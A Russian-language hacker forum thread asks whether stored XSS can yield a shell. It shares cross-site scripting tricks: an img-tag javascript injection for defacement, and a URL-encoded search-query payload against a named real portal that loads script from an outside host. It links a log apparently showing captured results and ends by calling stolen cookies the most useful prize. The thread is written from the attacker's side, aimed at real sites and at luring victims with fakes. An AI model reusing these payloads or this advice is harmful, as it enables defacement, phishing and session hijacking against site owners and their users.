Врятли!

шелл через кроссайтскриптинг?
вопрос интересный.
если активная xss вы к примеру можете закодировать в страничку екзешник какой нить троян.
или Сделать псевдо-дефейс-)))
Это когда к примеру нашёл активную хсс на гл. страничке сайта и по средствам вставки скрипта перекрывающего страничку можно вставить тэги и устроить дефейс.


как год назад: http://history-php-fusion.narod.ru/123.PNG
а вставка была в <img src=javascript:document.wite('AIRSG')>

Да это я знаю сам прикалывался ,а вот насколько реально запустить шелл через хсс?
(ХСС активная.)

Это вообще невозможно.

__XT__ Даже при поможи пасифки можно такое сделать
Даже вставить целвый html файл!

А если шелл попробовать запустить как каритинку таким образом:
<img src="Ссылка на шелл-картинку" alt="" border="0">

Конечно же не выйдет! )
Но можно вставить js так а в нём будит типо
document.wite
Так тока html файлы вставлять!
Можно Фейк сделать неплохой!

http://planeta.rambler.ru/srch?words=%22%3E%3C%73%63%72%69%70%74%20%73%72%63 %3D%68%74%74%70%3A%2F%2F%6D%69%72%69%6E%65%74%2E%6 E%61%72%6F%64%2E%72%75%2F%31%2E%6A%73%3E%3C%2F%73% 63%72%69%70%74%3E

Вот вам пример!
http://guap-spb.jino-net.ru/log01.txt

посмотрите всё просто!

И что этим фейком можно делать? Только жертв заманивать.
Мнеб чёнить такое чтоб можно было файл загрузить или просматреть.

Да нельзя шелл через хсс.Зарубите на носу это.Закрыто.Самое полезное - куки.

__________________

Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze